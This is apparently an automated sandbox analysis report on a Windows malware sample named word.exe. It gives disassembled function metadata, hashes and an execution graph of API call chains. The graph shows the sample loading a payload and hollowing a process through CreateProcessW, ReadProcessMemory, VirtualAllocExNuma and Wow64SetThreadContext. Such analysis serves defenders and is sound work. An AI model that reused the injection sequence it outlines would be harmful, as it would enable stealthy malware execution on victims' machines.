                                  Function 004056D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Roaming,00402CC1,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\word.exe,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 004056D8
                                  • CharPrevA.USER32(80000000,00000000), ref: 004056E6
                                  Strings
                                  • C:\Users\user\AppData\Roaming, xrefs: 004056D2
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrlen
                                  • String ID: C:\Users\user\AppData\Roaming
                                  • API String ID: 2709904686-2707566632
                                  • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                  • Instruction ID: dce4988d3f9ae1539138201c89f565164349ec5ceb08caa00e339266b5a49006
                                  • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                  • Instruction Fuzzy Hash: 7FD0A772809D701EF30363108C04B8FBA48CF12310F490862E042E6191C27C6C414BBD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004057E4 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405804
                                  • CharNextA.USER32(00000000), ref: 00405812
                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: lstrlen$CharNextlstrcmpi
                                  • String ID:
                                  • API String ID: 190613189-0
                                  • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                  • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                                  • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                  • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:5.8%
                                  Dynamic/Decrypted Code Coverage:14.5%
                                  Signature Coverage:2.6%
                                  Total number of Nodes:690
                                  Total number of Limit Nodes:31
                                  execution_graph 23332 409440 15 API calls ctype 23333 409c40 46 API calls __Tolower 23440 408240 LeaveCriticalSection _Ungetc 23441 41e642 FreeLibrary 23445 41a647 42 API calls ___free_lconv_mon 23446 401649 107 API calls std::ios_base::failure::failure 23336 40e44b 43 API calls _Ungetc 23449 40ae50 68 API calls 4 library calls 23341 401051 44 API calls 2 library calls 23345 40f864 57 API calls 4 library calls 23346 401067 42 API calls pre_c_initialization 23456 42526b GetCommandLineA GetCommandLineW 23349 40c070 42 API calls 5 library calls 23458 417e79 7 API calls __wsopen_s 23159 40107f 23164 4036a0 23159->23164 23163 40109c 23165 4036b6 Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 23164->23165 23169 40a5a0 23165->23169 23168 40f84f 42 API calls __onexit 23168->23163 23178 4070b0 23169->23178 23173 40a5cc 23174 40a5e7 23173->23174 23189 40bc70 48 API calls std::ios_base::good 23173->23189 23176 401092 23174->23176 23190 40d673 9 API calls 2 library calls 23174->23190 23176->23168 23191 408ec0 23178->23191 23181 40f5a8 new 3 API calls 23182 407128 23181->23182 23183 40713c 23182->23183 23184 4040f0 std::ios_base::_Init 44 API calls 23182->23184 23185 40c450 23183->23185 23184->23183 23186 40c465 23185->23186 23229 4030f0 23186->23229 23188 40c46b std::ios_base::_Ios_base_dtor ctype 23188->23173 23189->23174 23190->23176 23194 408ee0 23191->23194 23195 408f08 23194->23195 23201 407121 23194->23201 23196 408f10 23195->23196 23197 408f1e 23195->23197 23219 410cd6 RaiseException 23196->23219 23199 408f58 23197->23199 23200 408f2f 23197->23200 23203 408f92 23199->23203 23204 408f69 23199->23204 23220 40aa90 47 API calls 2 library calls 23200->23220 23201->23181 23226 40aa90 47 API calls 2 library calls 23203->23226 23223 40aa90 47 API calls 2 library calls 23204->23223 23206 408f3a 23221 404050 40 API calls std::ios_base::failure::failure 23206->23221 23208 408f9d 23227 404050 40 API calls std::ios_base::failure::failure 23208->23227 23210 408f74 23224 404050 40 API calls std::ios_base::failure::failure 23210->23224 23213 408f48 23222 410cd6 RaiseException 23213->23222 23214 408f82 23225 410cd6 RaiseException 23214->23225 23215 408fab 23228 410cd6 RaiseException 23215->23228 23219->23201 23220->23206 23221->23213 23222->23201 23223->23210 23224->23214 23225->23201 23226->23208 23227->23215 23228->23201 23230 40caf9 std::_Lockit::_Lockit 7 API calls 23229->23230 23231 403100 23230->23231 23243 404d30 23231->23243 23233 403112 23242 40312a 23233->23242 23249 406540 23233->23249 23236 4031a3 23236->23188 23238 403167 23260 40d3f8 RaiseException EnterCriticalSection LeaveCriticalSection new 23238->23260 23239 40314f std::bad_alloc::bad_alloc 23259 410cd6 RaiseException 23239->23259 23261 40cb51 LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 23242->23261 23244 404d41 23243->23244 23245 404d75 23243->23245 23246 40caf9 std::_Lockit::_Lockit 7 API calls 23244->23246 23245->23233 23247 404d4b 23246->23247 23262 40cb51 LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 23247->23262 23250 406553 23249->23250 23251 403147 23249->23251 23250->23251 23252 40f5a8 new 3 API calls 23250->23252 23251->23238 23251->23239 23253 406562 std::locale::c_str 23252->23253 23258 40658e 23253->23258 23263 403c80 23253->23263 23258->23251 23273 404680 67 API calls 3 library calls 23258->23273 23259->23242 23260->23242 23261->23236 23262->23245 23264 40caf9 std::_Lockit::_Lockit 7 API calls 23263->23264 23265 403c93 _Yarn 23264->23265 23266 403cf6 23265->23266 23283 404170 39 API calls std::exception::exception 23265->23283 23274 40d52f 23266->23274 23270 403ce8 23284 410cd6 RaiseException 23270->23284 23272 403a00 39 API calls 2 library calls 23272->23258 23273->23251 23285 4188c9 23274->23285 23277 40d382 _Yarn 14 API calls 23279 40d553 23277->23279 23278 40d563 23281 40d382 _Yarn 14 API calls 23278->23281 23279->23278 23280 4188c9 std::_Locinfo::_Locinfo_ctor 66 API calls 23279->23280 23280->23278 23282 403d03 23281->23282 23282->23272 23283->23270 23284->23266 23290 41e5f7 23285->23290 23287 4188d6 23288 418674 std::_Locinfo::_Locinfo_ctor 66 API calls 23287->23288 23289 40d53b 23288->23289 23289->23277 23311 41e001 5 API calls std::_Lockit::_Lockit 23290->23311 23292 41e5fc 23312 41e01b 5 API calls std::_Lockit::_Lockit 23292->23312 23294 41e601 23313 41e035 5 API calls std::_Lockit::_Lockit 23294->23313 23296 41e606 23314 41e04f 23296->23314 23300 41e610 23318 41e083 5 API calls std::_Lockit::_Lockit 23300->23318 23302 41e615 23319 41e09d 5 API calls std::_Lockit::_Lockit 23302->23319 23304 41e61a 23320 41e0b7 5 API calls std::_Lockit::_Lockit 23304->23320 23306 41e61f 23307 41e0eb std::_Lockit::_Lockit 5 API calls 23306->23307 23308 41e624 23307->23308 23321 41e0d1 23308->23321 23310 41e629 23310->23310 23311->23292 23312->23294 23313->23296 23315 41e1ea std::_Lockit::_Lockit 5 API calls 23314->23315 23316 41e065 23315->23316 23317 41e069 5 API calls std::_Lockit::_Lockit 23316->23317 23317->23300 23318->23302 23319->23304 23320->23306 23322 41e1ea std::_Lockit::_Lockit 5 API calls 23321->23322 23323 41e0e7 23322->23323 23323->23310 23459 414600 RtlUnwind 23356 401c0b 48 API calls 23358 405010 14 API calls 2 library calls 23462 403e10 39 API calls std::exception::exception 23359 41ac16 8 API calls ___vcrt_uninitialize 23360 407018 15 API calls 2 library calls 23466 40d622 9 API calls 3 library calls 23057 240a42 23058 240a49 23057->23058 23059 240a55 23058->23059 23060 24020a 14 API calls 23058->23060 23061 240e38 ExitProcess 23058->23061 23060->23058 23365 407830 EnterCriticalSection _Ungetc 23469 413e30 6 API calls 4 library calls 23471 414e36 15 API calls 3 library calls 23368 407038 42 API calls 2 library calls 23370 40b8c0 69 API calls fpos 23473 40fac3 47 API calls 5 library calls 23062 40cacc 23063 40caf4 23062->23063 23064 40cadc 23062->23064 23064->23063 23066 40ed65 23064->23066 23069 40f42f 23066->23069 23070 40f441 23069->23070 23071 40f455 InitializeCriticalSectionAndSpinCount 23069->23071 23073 40f451 InitializeCriticalSectionEx 23070->23073 23072 40ed77 23071->23072 23072->23064 23073->23072 22912 2408b7 22924 24005f GetPEB 22912->22924 22914 24092e 22925 240838 22914->22925 22916 240936 22917 2409c9 22916->22917 22918 2409e5 CreateFileW 22916->22918 22918->22917 22919 240a0f VirtualAlloc ReadFile 22918->22919 22919->22917 22922 240a3c 22919->22922 22920 240a55 22922->22920 22923 240e38 ExitProcess 22922->22923 22938 24020a 22922->22938 22924->22914 22952 24005f GetPEB 22925->22952 22927 24084c 22953 24005f GetPEB 22927->22953 22929 24085f 22954 24005f GetPEB 22929->22954 22931 240872 22955 2407da 22931->22955 22933 240880 22934 24089c VirtualAllocExNuma 22933->22934 22935 2408a9 22934->22935 22960 24073a 22935->22960 22967 24005f GetPEB 22938->22967 22940 2403b3 22940->22922 22941 2403c1 CreateProcessW 22943 2403eb 22941->22943 22946 240218 22941->22946 22942 240410 ReadProcessMemory 22942->22943 22942->22946 22943->22940 22995 2411f2 22943->22995 22946->22940 22946->22941 22946->22942 22946->22943 22947 2413a1 11 API calls 22946->22947 22949 240675 Wow64SetThreadContext 22946->22949 22951 2411f2 11 API calls 22946->22951 22968 241287 22946->22968 22977 241040 22946->22977 22986 241141 22946->22986 22947->22946 22949->22943 22949->22946 22951->22946 22952->22927 22953->22929 22954->22931 22965 24005f GetPEB 22955->22965 22957 2407ea 22958 2407f0 GetSystemInfo 22957->22958 22959 24081b 22958->22959 22959->22933 22966 24005f GetPEB 22960->22966 22962 240746 22963 240766 VirtualAlloc 22962->22963 22964 240783 22963->22964 22964->22916 22965->22957 22966->22962 22967->22946 22969 2412a2 22968->22969 23004 24013e GetPEB 22969->23004 22971 2412c3 22972 24137b 22971->22972 22973 2412cb 22971->22973 23021 2416cd 10 API calls 22972->23021 23006 240e41 22973->23006 22976 241362 22976->22946 22978 24105b 22977->22978 22979 24013e GetPEB 22978->22979 22980 24107c 22979->22980 22981 241084 22980->22981 22982 24110e 22980->22982 22983 240e41 10 API calls 22981->22983 23029 2416f1 10 API calls 22982->23029 22985 2410f5 22983->22985 22985->22946 22987 24115c 22986->22987 22988 24013e GetPEB 22987->22988 22989 24117d 22988->22989 22990 2411c7 22989->22990 22991 241181 22989->22991 23030 241703 10 API calls 22990->23030 22993 240e41 10 API calls 22991->22993 22994 2411bc 22993->22994 22994->22946 22996 241205 22995->22996 22997 24013e GetPEB 22996->22997 22998 241226 22997->22998 22999 241270 22998->22999 23000 24122a 22998->23000 23031 2416bb 10 API calls 22999->23031 23002 240e41 10 API calls 23000->23002 23003 241265 23002->23003 23003->22940 23005 240160 23004->23005 23005->22971 23022 24005f GetPEB 23006->23022 23008 240e8a 23023 240109 GetPEB 23008->23023 23011 240f17 23012 240f28 VirtualAlloc 23011->23012 23015 240fec 23011->23015 23013 240f3e ReadFile 23012->23013 23012->23015 23014 240f53 VirtualAlloc 23013->23014 23013->23015 23014->23015 23018 240f74 23014->23018 23016 241035 23015->23016 23017 24102a VirtualFree 23015->23017 23016->22976 23017->23016 23018->23015 23019 240fdf VirtualFree 23018->23019 23020 240fdb CloseHandle 23018->23020 23019->23015 23020->23019 23021->22976 23022->23008 23024 24011c 23023->23024 23026 240131 CreateFileW 23024->23026 23027 24017b GetPEB 23024->23027 23026->23011 23026->23015 23028 24019f 23027->23028 23028->23024 23029->22985 23030->22994 23031->23003 23380 40fce9 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 23383 40f085 41 API calls 23032 41d295 GetLastError 23033 41d2b1 23032->23033 23034 41d2ab 23032->23034 23036 41e3df __Getcvt 6 API calls 23033->23036 23053 41d2b5 SetLastError 23033->23053 23055 41e3a0 6 API calls std::_Lockit::_Lockit 23034->23055 23037 41d2cd 23036->23037 23039 417f30 std::_Locinfo::_Getctype 12 API calls 23037->23039 23037->23053 23040 41d2e2 23039->23040 23041 41d2fb 23040->23041 23042 41d2ea 23040->23042 23043 41e3df __Getcvt 6 API calls 23041->23043 23044 41e3df __Getcvt 6 API calls 23042->23044 23045 41d307 23043->23045 23046 41d2f8 23044->23046 23047 41d322 23045->23047 23048 41d30b 23045->23048 23050 4190b2 ___free_lconv_mon 12 API calls 23046->23050 23056 41cf72 14 API calls __Getcvt 23047->23056 23049 41e3df __Getcvt 6 API calls 23048->23049 23049->23046 23050->23053 23052 41d32d 23054 4190b2 ___free_lconv_mon 12 API calls 23052->23054 23054->23053 23055->23033 23056->23052 23487 40e29d 69 API calls 4 library calls 23488 425a9f 43 API calls 2 library calls 23074 40109e 23075 4010a7 23074->23075 23082 403720 23075->23082 23077 4010b6 23087 406d10 39 API calls 23077->23087 23079 4010ca 23088 40f84f 42 API calls __onexit 23079->23088 23081 4010d4 23089 40f5a8 23082->23089 23086 40374d 23086->23077 23087->23079 23088->23081 23090 40f5ad ___std_exception_copy 23089->23090 23091 403739 23090->23091 23098 419df3 EnterCriticalSection LeaveCriticalSection new 23090->23098 23099 40feeb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 23090->23099 23100 40cc79 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 23090->23100 23091->23086 23095 4040f0 23091->23095 23101 40d42c 23095->23101 23097 4040fe 23097->23086 23098->23090 23102 40d438 __EH_prolog3 23101->23102 23113 40caf9 23102->23113 23108 40d474 23132 40cb51 LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 23108->23132 23109 40d4b2 codecvt 23109->23097 23114 40cb08 23113->23114 23115 40cb0f 23113->23115 23133 417f19 6 API calls 2 library calls 23114->23133 23117 40cb0d 23115->23117 23134 40ed7c EnterCriticalSection 23115->23134 23117->23108 23119 40d59c 23117->23119 23120 40f5a8 new 3 API calls 23119->23120 23121 40d5a7 23120->23121 23122 40d456 23121->23122 23135 40d25e 14 API calls _Yarn 23121->23135 23124 40d5c1 23122->23124 23125 40d5cd 23124->23125 23126 40d45e 23124->23126 23136 40f057 23125->23136 23128 40d382 23126->23128 23129 40d390 23128->23129 23131 40d39c _wmemmove ___std_exception_copy 23128->23131 23129->23131 23158 414d21 14 API calls ___free_lconv_mon 23129->23158 23131->23108 23132->23109 23133->23117 23134->23117 23135->23122 23137 40f067 RtlEncodePointer 23136->23137 23138 41940c 23136->23138 23137->23126 23149 422b4c EnterCriticalSection LeaveCriticalSection _Atexit 23138->23149 23140 419411 23145 41941c 23140->23145 23150 422b91 39 API calls 5 library calls 23140->23150 23142 419426 IsProcessorFeaturePresent 23143 419432 23142->23143 23151 414847 23143->23151 23145->23142 23148 419445 23145->23148 23147 41944f 23157 41a2c3 21 API calls _Atexit 23148->23157 23149->23140 23150->23145 23152 414863 _Atexit char_traits 23151->23152 23153 41488f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 23152->23153 23156 414960 _Atexit 23153->23156 23154 40fcf3 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23155 41497e 23154->23155 23155->23148 23156->23154 23157->23147 23158->23131 23489 422e9d IsProcessorFeaturePresent 23490 404ea0 71 API calls std::ios_base::_Tidy 23393 4094b0 75 API calls _swprintf_s 23394 409cb0 LCMapStringW __Towlower 23496 422eb0 15 API calls 23499 4202b7 66 API calls _Ungetc 23396 40fcba 22 API calls 2 library calls 23397 40e0bc 20 API calls 3 library calls 23398 4228bd 90 API calls __wsopen_s 23503 40bf40 68 API calls char_traits 23399 40f941 DeleteCriticalSection CloseHandle 23401 42194b GetProcessHeap 23402 41194b 49 API calls 23403 40114b 47 API calls pre_c_initialization 23507 409350 GetStringTypeW __Getwctypes 23508 40e751 43 API calls 4 library calls 23509 42775b 42 API calls 3 library calls 23407 42195d 42 API calls 2 library calls 23324 40fb6f 23329 41024e SetUnhandledExceptionFilter 23324->23329 23326 40fb74 pre_c_initialization 23330 41c68f 39 API calls _memcpy_s 23326->23330 23328 40fb7f 23329->23326 23330->23328 23512 40bb70 66 API calls 23513 241715 10 API calls 23412 40b100 41 API calls char_traits 23414 427508 44 API calls 3 library calls 23415 41f90b 53 API calls 2 library calls 23521 414f0e 73 API calls 2 library calls 23524 402712 40 API calls 2 library calls 23525 41a315 40 API calls 2 library calls 23419 41e929 15 API calls 23529 40cb2a DeleteCriticalSection std::_Init_locks::~_Init_locks 23421 40112c 78 API calls pre_c_initialization 23422 40a530 69 API calls 23424 414530 5 API calls 2 library calls 22677 42c3c0 22680 42500b 22677->22680 22681 425046 22680->22681 22682 425014 22680->22682 22686 41d1ff 22682->22686 22687 41d20a 22686->22687 22690 41d210 22686->22690 22734 41e3a0 6 API calls std::_Lockit::_Lockit 22687->22734 22692 41d216 22690->22692 22735 41e3df 22690->22735 22694 41d21b 22692->22694 22741 41940c 39 API calls _Atexit 22692->22741 22711 424e16 22694->22711 22695 417f30 std::_Locinfo::_Getctype 14 API calls 22697 41d23a 22695->22697 22698 41d242 22697->22698 22699 41d257 22697->22699 22701 41e3df __Getcvt 6 API calls 22698->22701 22700 41e3df __Getcvt 6 API calls 22699->22700 22702 41d263 22700->22702 22703 41d24e 22701->22703 22704 41d267 22702->22704 22705 41d276 22702->22705 22706 4190b2 ___free_lconv_mon 14 API calls 22703->22706 22707 41e3df __Getcvt 6 API calls 22704->22707 22740 41cf72 14 API calls __Getcvt 22705->22740 22706->22692 22707->22703 22709 41d281 22710 4190b2 ___free_lconv_mon 14 API calls 22709->22710 22710->22694 22742 424f6b 22711->22742 22718 424e72 22721 4190b2 ___free_lconv_mon 14 API calls 22718->22721 22719 424e80 22767 425066 22719->22767 22722 424e59 22721->22722 22722->22681 22724 424eb8 22778 414cb1 14 API calls _Atexit 22724->22778 22726 424ebd 22729 4190b2 ___free_lconv_mon 14 API calls 22726->22729 22727 424eff 22728 424f48 22727->22728 22779 424a8f 39 API calls 2 library calls 22727->22779 22732 4190b2 ___free_lconv_mon 14 API calls 22728->22732 22729->22722 22730 424ed3 22730->22727 22733 4190b2 ___free_lconv_mon 14 API calls 22730->22733 22732->22722 22733->22727 22734->22690 22736 41e1ea std::_Lockit::_Lockit 5 API calls 22735->22736 22737 41e3fb 22736->22737 22738 41e419 TlsSetValue 22737->22738 22739 41d22a 22737->22739 22739->22692 22739->22695 22740->22709 22743 424f77 ___scrt_is_nonwritable_in_current_image 22742->22743 22744 424f91 22743->22744 22780 417eba EnterCriticalSection 22743->22780 22746 424e40 22744->22746 22782 41940c 39 API calls _Atexit 22744->22782 22753 424b9d 22746->22753 22747 424fcd 22781 424fea LeaveCriticalSection std::_Lockit::~_Lockit 22747->22781 22751 424fa1 22751->22747 22752 4190b2 ___free_lconv_mon 14 API calls 22751->22752 22752->22747 22783 414aa4 22753->22783 22756 424bd0 22758 424be7 22756->22758 22759 424bd5 GetACP 22756->22759 22757 424bbe GetOEMCP 22757->22758 22758->22722 22760 4190ec 22758->22760 22759->22758 22761 41912a 22760->22761 22762 4190fa ___crtLCMapStringA 22760->22762 22824 414cb1 14 API calls _Atexit 22761->22824 22762->22761 22764 419115 RtlAllocateHeap 22762->22764 22823 419df3 EnterCriticalSection LeaveCriticalSection new 22762->22823 22764->22762 22765 419128 22764->22765 22765->22718 22765->22719 22768 424b9d 41 API calls 22767->22768 22770 425086 22768->22770 22769 42518b 22836 40fcf3 22769->22836 22770->22769 22771 4250c3 IsValidCodePage 22770->22771 22775 4250de char_traits 22770->22775 22771->22769 22774 4250d5 22771->22774 22773 424ead 22773->22724 22773->22730 22774->22775 22776 4250fe GetCPInfo 22774->22776 22825 424c71 22775->22825 22776->22769 22776->22775 22778->22726 22779->22728 22780->22751 22781->22744 22784 414ac2 22783->22784 22785 414abb 22783->22785 22784->22785 22791 41d144 GetLastError 22784->22791 22785->22756 22785->22757 22789 414af9 22819 41d4cb 39 API calls __Toupper 22789->22819 22792 41d160 22791->22792 22793 41d15a 22791->22793 22795 41e3df __Getcvt 6 API calls 22792->22795 22797 41d164 SetLastError 22792->22797 22820 41e3a0 6 API calls std::_Lockit::_Lockit 22793->22820 22796 41d17c 22795->22796 22796->22797 22799 417f30 std::_Locinfo::_Getctype 14 API calls 22796->22799 22800 414ae3 22797->22800 22801 41d1f9 22797->22801 22802 41d191 22799->22802 22818 41d46d 39 API calls __Getcvt 22800->22818 22822 41940c 39 API calls _Atexit 22801->22822 22803 41d199 22802->22803 22804 41d1aa 22802->22804 22806 41e3df __Getcvt 6 API calls 22803->22806 22807 41e3df __Getcvt 6 API calls 22804->22807 22809 41d1a7 22806->22809 22810 41d1b6 22807->22810 22814 4190b2 ___free_lconv_mon 14 API calls 22809->22814 22811 41d1d1 22810->22811 22812 41d1ba 22810->22812 22821 41cf72 14 API calls __Getcvt 22811->22821 22813 41e3df __Getcvt 6 API calls 22812->22813 22813->22809 22814->22797 22816 41d1dc 22817 4190b2 ___free_lconv_mon 14 API calls 22816->22817 22817->22797 22818->22789 22819->22785 22820->22792 22821->22816 22823->22762 22824->22765 22826 424c99 GetCPInfo 22825->22826 22835 424d62 22825->22835 22827 424cb1 22826->22827 22826->22835 22843 421cc0 22827->22843 22828 40fcf3 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22830 424e14 22828->22830 22830->22769 22834 421fb0 43 API calls 22834->22835 22835->22828 22837 40fcfc 22836->22837 22838 40fcfe IsProcessorFeaturePresent 22836->22838 22837->22773 22840 4104a8 22838->22840 22911 41046c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22840->22911 22842 41058b 22842->22773 22844 414aa4 __Toupper 39 API calls 22843->22844 22845 421ce0 22844->22845 22863 424257 22845->22863 22847 421d9c 22849 40fcf3 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22847->22849 22848 421d94 22866 40ef9b 14 API calls ___free_lconv_mon 22848->22866 22852 421dbf 22849->22852 22850 421d0d 22850->22847 22850->22848 22851 4190ec ___crtLCMapStringA 15 API calls 22850->22851 22854 421d32 __alloca_probe_16 char_traits 22850->22854 22851->22854 22858 421fb0 22852->22858 22854->22848 22855 424257 __Toupper MultiByteToWideChar 22854->22855 22856 421d7b 22855->22856 22856->22848 22857 421d82 GetStringTypeW 22856->22857 22857->22848 22859 414aa4 __Toupper 39 API calls 22858->22859 22860 421fc3 22859->22860 22869 421dc1 22860->22869 22867 4241bf 22863->22867 22866->22847 22868 4241d0 MultiByteToWideChar 22867->22868 22868->22850 22870 421ddc ___crtLCMapStringA 22869->22870 22871 424257 __Toupper MultiByteToWideChar 22870->22871 22874 421e20 22871->22874 22872 421f9b 22873 40fcf3 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22872->22873 22875 421fae 22873->22875 22874->22872 22876 4190ec ___crtLCMapStringA 15 API calls 22874->22876 22878 421e46 __alloca_probe_16 22874->22878 22889 421eee 22874->22889 22875->22834 22876->22878 22879 424257 __Toupper MultiByteToWideChar 22878->22879 22878->22889 22880 421e8f 22879->22880 22880->22889 22897 41e55e 22880->22897 22883 421ec5 22888 41e55e std::_Locinfo::_Locinfo_ctor 6 API calls 22883->22888 22883->22889 22884 421efd 22885 421f86 22884->22885 22886 4190ec ___crtLCMapStringA 15 API calls 22884->22886 22890 421f0f __alloca_probe_16 22884->22890 22905 40ef9b 14 API calls ___free_lconv_mon 22885->22905 22886->22890 22888->22889 22906 40ef9b 14 API calls ___free_lconv_mon 22889->22906 22890->22885 22891 41e55e std::_Locinfo::_Locinfo_ctor 6 API calls 22890->22891 22892 421f52 22891->22892 22892->22885 22903 424311 WideCharToMultiByte _Fputc 22892->22903 22894 421f6c 22894->22885 22895 421f75 22894->22895 22904 40ef9b 14 API calls ___free_lconv_mon 22895->22904 22907 41e0eb 22897->22907 22901 41e5af LCMapStringW 22902 41e56f 22901->22902 22902->22883 22902->22884 22902->22889 22903->22894 22904->22889 22905->22889 22906->22872 22908 41e1ea std::_Lockit::_Lockit 5 API calls 22907->22908 22909 41e101 22908->22909 22909->22902 22910 41e5bb 5 API calls std::_Locinfo::_Locinfo_ctor 22909->22910 22910->22901 22911->22842 23427 4245d2 40 API calls 5 library calls 23428 4099d0 72 API calls 2 library calls 23531 40d3d6 16 API calls 2 library calls 23536 41d3e9 16 API calls _Atexit 23430 4199f1 20 API calls 23537 40eff3 DecodePointer 22449 40fb81 22450 40fb8d ___scrt_is_nonwritable_in_current_image 22449->22450 22470 40f675 22450->22470 22453 40fb94 22458 40fbbd ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock _Atexit 22453->22458 22521 4100bc IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter char_traits 22453->22521 22454 40fbdc ___scrt_is_nonwritable_in_current_image 22455 40fc5c 22481 4101d7 22455->22481 22457 40fc62 22485 401440 22457->22485 22458->22454 22458->22455 22522 41a2d9 39 API calls 4 library calls 22458->22522 22463 40fc7e 22464 40fc88 22463->22464 22524 41a2ff 21 API calls _Atexit 22463->22524 22466 40fc91 22464->22466 22525 41a2b4 21 API calls _Atexit 22464->22525 22526 40f7ec 76 API calls 2 library calls 22466->22526 22469 40fc99 22469->22454 22471 40f67e 22470->22471 22527 40ff08 IsProcessorFeaturePresent 22471->22527 22473 40f68a 22528 413d9d 22473->22528 22475 40f68f 22476 40f693 22475->22476 22537 41acb4 22475->22537 22476->22453 22479 40f6aa 22479->22453 22663 4116a0 22481->22663 22484 4101fd 22484->22457 22665 40f5ee 22485->22665 22487 401493 22523 41020a GetModuleHandleW 22487->22523 22488 401481 22488->22487 22489 40151c VirtualAlloc 22488->22489 22671 401980 22489->22671 22521->22453 22522->22455 22523->22463 22524->22464 22525->22466 22526->22469 22527->22473 22529 413da2 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 22528->22529 22541 414428 22529->22541 22532 413db0 22532->22475 22534 413db8 22535 413dc3 22534->22535 22555 414464 DeleteCriticalSection 22534->22555 22535->22475 22583 425376 22537->22583 22540 413dc6 8 API calls 3 library calls 22540->22476 22542 414431 22541->22542 22544 41445a 22542->22544 22545 413dac 22542->22545 22556 4141a2 22542->22556 22561 414464 DeleteCriticalSection 22544->22561 22545->22532 22547 414369 22545->22547 22576 4140b7 22547->22576 22549 414373 22550 41437e 22549->22550 22581 414165 6 API calls try_get_function 22549->22581 22550->22534 22552 41438c 22553 414399 22552->22553 22582 41439c 6 API calls ___vcrt_FlsFree 22552->22582 22553->22534 22555->22532 22562 413f96 22556->22562 22559 4141d9 InitializeCriticalSectionAndSpinCount 22560 4141c5 22559->22560 22560->22542 22561->22545 22563 413fca 22562->22563 22567 413fc6 22562->22567 22563->22559 22563->22560 22564 413fea 22564->22563 22566 413ff6 GetProcAddress 22564->22566 22568 414006 __crt_fast_encode_pointer 22566->22568 22567->22563 22567->22564 22569 414036 22567->22569 22568->22563 22570 414053 22569->22570 22571 41405e LoadLibraryExW 22569->22571 22570->22567 22572 41407a GetLastError 22571->22572 22573 414092 22571->22573 22572->22573 22574 414085 LoadLibraryExW 22572->22574 22573->22570 22575 4140a9 